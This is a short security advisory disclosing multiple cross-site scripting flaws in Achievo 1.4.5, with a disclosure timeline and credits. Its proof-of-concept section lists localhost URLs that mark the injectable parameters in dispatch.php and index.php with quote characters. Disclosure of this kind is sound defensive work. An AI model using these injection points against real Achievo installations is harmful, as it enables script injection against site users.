Advisory: Achievo 1.4.5 Multiple XSS vulnerabilities Advisory ID: SSCHADV2011-037 Author: Stefan Schurtz Affected Software: Successfully tested on Achievo 1.4.5 Vendor URL: http://www.achievo.org/ Vendor Status: informed CVE-ID: - ========================== Vulnerability Description ========================== Achievo 1.4.5 is prone to multiple Cross-Site scripting vulernabilities ================== PoC-Exploit ================== hhttp://localhost/achievo-1.4.5/?'" http://localhost/achievo-1.4.5/index.php?'" http://localhost/achievo-1.4.5/dispatch.php?atknodetype=pim.pim&atkaction='"&atklevel=-1&atkprevlevel=0&=3 http://localhost/achievo-1.4.5/dispatch.php?atknodetype=employee.employee&atkaction=admin&atklevel='"&atkprevlevel=0&atkstackid=4ed138e7eed8c&=3 http://localhost/achievo-1.4.5/dispatch.php?atknodetype=employee.employee&atkaction=admin&atklevel=1&atkprevlevel=0&atkstackid='"&=3 http://localhost/achievo-1.4.5//dispatch.php?atknodetype='"&atkaction=admin&atkpartial=datagrid&atklevel=-3&atkprevlevel=0&atkstackid=4ed13952e1bf3&=3 ========= Solution ========= - ==================== Disclosure Timeline ==================== 26-Nov-2011 - informed developers 28-Nov-2011 - release date of this security advisory ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://www.rul3z.de/advisories/SSCHADV2011-037.txti